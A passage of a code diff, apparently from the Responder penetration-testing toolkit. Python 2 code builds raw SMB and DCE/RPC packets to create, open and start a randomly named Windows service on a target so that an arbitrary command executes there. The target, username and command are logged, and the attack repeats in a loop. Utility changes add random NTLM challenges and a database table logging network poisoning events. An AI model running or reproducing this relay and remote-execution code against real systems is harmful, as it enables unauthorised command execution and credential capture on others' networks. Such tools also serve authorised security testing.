head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
ContextHandler = data[88:108]
ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)])
ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat'
w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,ReferentID="\x21\x03\x03\x00",BinCMD=CMD)
w.calculate()
x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
x.calculate()
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service"
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
w.calculate()
x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
x.calculate()
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service"
ContextHandler = data[88:108]
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
x.calculate()
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
if data[8:10] == "\x2e\x00":
print "[+] Command successful !"
Logs.info('Command successful:')
Logs.info(Target+","+Username+','+CMD)
return True
if data[8:10] != "\x2e\x00":
return False
def RunInloop(Target,Command,Domain):
try:
while True:
worker = RunRelay(Target,Command,Domain)
except:
raise
def main():
try:
thread.start_new(RunInloop,(Target,Command,Domain))
except KeyboardInterrupt:
exit()
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
raise
raw_input()

0
tools/RelayHTTPSMB/odict.py → tools/odict.py
View File

37
utils.py
View File

@@ -23,6 +23,17 @@ import time
import settings
import datetime
def RandomChallenge():
if settings.Config.NumChal == "random":
from random import getrandbits
NumChal = '%016x' % getrandbits(16 * 4)
Challenge = ''
for i in range(0, len(NumChal),2):
Challenge += NumChal[i:i+2].decode("hex")
return Challenge
else:
return settings.Config.Challenge
def HTTPCurrentDate():
Date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
return Date
@@ -135,14 +146,17 @@ def DumpConfig(outfile, data):
with open(outfile,"a") as dump:
dump.write(data + '\n')
def SaveToDb(result):
# Creating the DB if it doesn't exist
def CreateResponderDb():
if not os.path.exists(settings.Config.DatabaseFile):
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.execute('CREATE TABLE responder (timestamp varchar(32), module varchar(16), type varchar(16), client varchar(32), hostname varchar(32), user varchar(32), cleartext varchar(128), hash varchar(512), fullhash varchar(512))')
cursor.execute('CREATE TABLE Poisoned (timestamp TEXT, Poisoner TEXT, SentToIp TEXT, ForName TEXT, AnalyzeMode TEXT)')
cursor.commit()
cursor.execute('CREATE TABLE responder (timestamp TEXT, module TEXT, type TEXT, client TEXT, hostname TEXT, user TEXT, cleartext TEXT, hash TEXT, fullhash TEXT)')
cursor.commit()
cursor.close()
def SaveToDb(result):
for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
if not k in result:
result[k] = ''
@@ -211,6 +225,23 @@ def SaveToDb(result):
cursor.commit()
cursor.close()
def SavePoisonersToDb(result):
for k in [ 'Poisoner', 'SentToIp', 'ForName', 'AnalyzeMode' ]:
if not k in result:
result[k] = ''
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.text_factory = sqlite3.Binary # We add a text factory to support different charsets
res = cursor.execute("SELECT COUNT(*) AS count FROM Poisoned WHERE Poisoner=? AND SentToIp=? AND ForName=? AND AnalyzeMode=?", (result['Poisoner'], result['SentToIp'], result['ForName'], result['AnalyzeMode']))
(count,) = res.fetchone()
if not count:
cursor.execute("INSERT INTO Poisoned VALUES(datetime('now'), ?, ?, ?, ?)", (result['Poisoner'], result['SentToIp'], result['ForName'], result['AnalyzeMode']))
cursor.commit()
cursor.close()
def Parse_IPV6_Addr(data):
if data[len(data)-4:len(data)][1] =="\x1c":